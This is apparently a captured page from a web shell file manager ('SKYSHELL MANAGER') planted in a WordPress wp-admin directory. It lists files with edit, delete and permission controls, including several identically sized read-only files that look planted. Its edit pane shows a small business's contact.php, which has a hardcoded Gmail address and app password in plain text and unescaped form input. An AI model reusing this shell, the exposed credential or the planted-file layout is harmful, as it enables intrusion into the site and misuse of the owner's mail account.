📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: contact.php
<!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>Choice Auto Express - Contact </title> <!-- Favicon --> <link rel="shortcut icon" type="image/icon" href="images/fav12.png"/> <!-- Font Awesome --> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M" crossorigin="anonymous"> <!-- Slick slider --> <link href="assets/css/slick.css" rel="stylesheet"> <!-- Gallery Lightbox --> <link href="assets/css/magnific-popup.css" rel="stylesheet"> <!-- Skills Circle CSS --> <link rel="stylesheet" type="text/css" href="https://unpkg.com/circlebars@1.0.3/dist/circle.css"> <!-- Main Style --> <link href="style.css" rel="stylesheet"> <!-- Fonts --> <!-- Google Fonts Raleway --> <link href="https://fonts.googleapis.com/css?family=Raleway:300,400,400i,500,500i,600,700" rel="stylesheet"> <!-- Google Fonts Open sans --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400i,600,700,800" rel="stylesheet"> <style> #g-recaptcha-response { display: block !important; position: absolute; margin: -78px 0 0 0 !important; width: 302px !important; height: 76px !important; z-index: -999999; opacity: 0; } </style> <script> window.addEventListener('load', () => { const $recaptcha = document.querySelector('#g-recaptcha-response'); if ($recaptcha) { $recaptcha.setAttribute('required', 'required'); } }) </script> <script src="https://www.google.com/recaptcha/api.js" async defer></script> </head> <body> <!--START SCROLL TOP BUTTON --> <a class="scrollToTop" href="#"> <i class="fa fa-angle-up"></i> </a> <!-- END SCROLL TOP BUTTON --> <!-- Start Header --> <header id="mu-hero"> <div class="container"> <nav class="navbar navbar-expand-lg navbar-light mu-navbar"> <!-- Text based logo --> <a class="navbar-brand mu-logo" href="index.php"><span><img src="images/logo13.png" title="" alt=""></span></a> <!-- image based logo --> <!-- <a class="navbar-brand mu-logo" href="index.html"><img src="assets/images/logo.png" alt="logo"></a> --> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="fa fa-bars"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav mr-auto mu-navbar-nav"> <li class="nav-item"> <a href="index.php">Home</a> </li> <li class="nav-item"><a href="about.php">About us</a></li> <li class="nav-item"><a href="services.php">Services</a></li> <li class="nav-item"><a href="types.php">Types</a></li> <li class="nav-item active"><a href="contact.php">Contact us</a></li> </ul> </div> </nav> </div> </header> <!-- End Header --> <!-- Start Breadcrumb --> <div id="mu-breadcrumb"> <div class="container"> <div class="row"> <div class="col-md-12"> <nav aria-label="breadcrumb" role="navigation"> <ol class="breadcrumb mu-breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Contact Us</li> </ol> </nav> </div> </div> </div> </div> <!-- End Breadcrumb --> <!-- Start main content --> <main> <!-- Start Contact --> <section id="mu-contact"> <div class="container"> <div class="row"> <div class="col-sm-12"> <div class="mu-title" style="line-height:35px"> <h2 style="margin-top:10%">Welcome to Contact Us</h2> <p><span class="fa fa-user mu-contact-icon"></span> <b>Address:</b> 1365 George Dieter Dr,<br> El Paso, TX 79936,<br> USA.</p> <p><span class="fa fa-phone mu-phone-icon"></span><b> Phone:</b> (+1) 915 555 1234</p> <p><span class="fa fa-pencil-square-o mu-contact-icon"></span><b> Mail:</b> ryan@choiceautoexpress.com</p> </div> </div> <div class="col-sm-8"> <div class="mu-contact-area left" style="float:left;width:60%;padding-top: 20px !important;"> <!-- Title --> <!-- Start Contact Content --> <div class="mu-contact-content"> <div class="row"> <div class="col-md-12"> <h2 style="margin-top:10%">Enquire Us</h2> <div class="mu-contact-form-area"> <div id="form-messages"></div> <form method="post" action="contact.php" class="mu-contact-form"> <div class="form-group"> <span class="fa fa-user mu-contact-icon"></span> <input type="text" class="form-control" placeholder="Name" id="name" name="name" required> </div> <div class="form-group"> <span class="fa fa-envelope mu-contact-icon"></span> <input type="email" class="form-control" placeholder="Enter Email" id="email" name="email" required> </div> <div class="form-group"> <span class="fa fa-folder-open-o mu-contact-icon"></span> <input type="text" class="form-control" placeholder="Your phone no" id="phone" name="phone" required> </div> <div class="form-group"> <span class="fa fa-pencil-square-o mu-contact-icon"></span> <textarea class="form-control" placeholder="Message" id="message" name="message" required></textarea> </div> <div class="form-group"> <div class="g-recaptcha" data-sitekey="6Lcrt5IoAAAAAKdbi5ampjKih-aIYWSQV1YFVOB5"></div> </div> <input type="submit" class="mu-send-msg-btn" name="Submit" value="Send Message"> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'ryan@choiceautoexpress.com'; // YOUR gmail email $mail->Password = 'proojlhyefuuhixf'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('ryan@choiceautoexpress.com', 'Choice Auto Express'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('ryan@choiceautoexpress.com', 'Choice Auto Express'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Contact Replay [Success]"; $mail->Body = "<h2>Thank you for Contact us.</h2> <p>This e-mail was sent from Choice Auto Express</p>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Success! check your email."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'ryan@choiceautoexpress.com'; // YOUR gmail email $mail2->Password = 'proojlhyefuuhixf'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('ryan@choiceautoexpress.com', 'Choice Auto Express'); $mail2->addAddress('ryan@choiceautoexpress.com', 'Choice Auto Express'); //$mail->addReplyTo('ryan@choiceautoexpress.com', 'Choice Auto Express'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted contact details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </div> </div> </div> </div> </div> </div> <div class="col-sm-4"> <div style="padding-top: 60px !important;"> <div class="right" style="float:right;padding:"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d4175.595245142595!2d-106.30593452438006!3d31.729560774118823!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x86e74374235bf16d%3A0x564215f6ee12574b!2s1365%20George%20Dieter%20Dr%2C%20El%20Paso%2C%20TX%2079936%2C%20USA!5e1!3m2!1sen!2sin!4v1770723005478!5m2!1sen!2sin" width="600" height="450" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe> </div> </div> </div> <!-- End Contact Content --> </div> </div> </div> </div> </section> <!-- End Contact --> <!-- Google map --> <!--<div id="mu-google-map"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d5587.276523544827!2d-112.24957135276773!3d33.62567994719291!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x872b42877a88a449%3A0xcb99d73393433b1f!2s8799%20W%20Betty%20Elyse%20Ln%2C%20Peoria%2C%20AZ%2085382%2C%20USA!5e0!3m2!1sen!2sin!4v1574750065013!5m2!1sen!2sin" width="600" height="450" frameborder="0" style="border:0;" allowfullscreen=""></iframe> </div>--> </main> <!-- End main content --> <!-- Start footer --> <footer id="mu-footer"> <div class="mu-footer-top"> <div class="container"> <div class="row"> <div class="col-md-3"> <div class="mu-single-footer"> <h3>About Us</h3> <p style="text-align:justify">Our core team constitutes of professionals with over a span of two decades of experience in Insurance and legal space. We started this new enterprise in March 2018 with a vision to meet the unmet needs of mistreated Insurance Policy Holders. While working with the Insurance companies, </p> <a href="about.php" title="" alt="" style="float:right;color:#fff;font-weight:bold;">+Read More</a> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Quick links</h3> <ul class="mu-useful-links"> <li><a href="about.php">About us</a></li> <li><a href="services.php">Services</a></li> <li><a href="types.php">Types</a></li> <li><a href="contact.php">Contact</a></li> </ul> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Information</h3> <ul class="mu-useful-links"> <li><a href="privacy.php">Privacy-Policy</a></li> <li><a href="terms.php">Terms and Conditions</a></li> <li><a href="subscribe.php">Subscribe</a></li> <li><a href="unsubscribe.php">Unsubscribe</a></li> </ul> </div> </div> <div class="col-md-3"> <div class="mu-single-footer"> <h3>Contact Information</h3> <ul class="list-unstyled"> <li class="media"> <span class="fa fa-home"></span> <div class="media-body"> <p>1365 George Dieter Dr,<br> El Paso, TX 79936,<br> USA.</p> </div> </li> <li class="media"> <span class="fa fa-phone"></span> <div class="media-body"> <p>(+1) 915 555 1234</p> </div> </li> <li class="media"> <span class="fa fa-envelope"></span> <div class="media-body"> <p>ryan@choiceautoexpress.com</p> </div> </li> </ul> </div> </div> </div> </div> </div> <div class="mu-footer-bottom"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="mu-footer-bottom-area"> <p class="mu-copy-right">Copyright © 2025 . All right reserved.</p> </div> </div> </div> </div> </div> </footer> <!-- End footer --> <!-- JavaScript --> <!-- jQuery first, then Popper.js, then Bootstrap JS --> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4" crossorigin="anonymous"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1" crossorigin="anonymous"></script> <!-- Slick slider --> <script type="text/javascript" src="assets/js/slick.min.js"></script> <!-- Progress Bar --> <script src="https://unpkg.com/circlebars@1.0.3/dist/circle.js"></script> <!-- Filterable Gallery js --> <script type="text/javascript" src="assets/js/jquery.filterizr.min.js"></script> <!-- Gallery Lightbox --> <script type="text/javascript" src="assets/js/jquery.magnific-popup.min.js"></script> <!-- Counter js --> <script type="text/javascript" src="assets/js/counter.js"></script> <!-- Ajax contact form --> <script type="text/javascript" src="assets/js/app.js"></script> <!-- Custom js --> <script type="text/javascript" src="assets/js/custom.js"></script> <!-- About us Skills Circle progress --> <script> // First circle new Circlebar({ element : "#circle-1", type : "progress", maxValue: "90" }); // Second circle new Circlebar({ element : "#circle-2", type : "progress", maxValue: "84" }); // Third circle new Circlebar({ element : "#circle-3", type : "progress", maxValue: "60" }); // Fourth circle new Circlebar({ element : "#circle-4", type : "progress", maxValue: "74" }); </script> </body> </html>
Save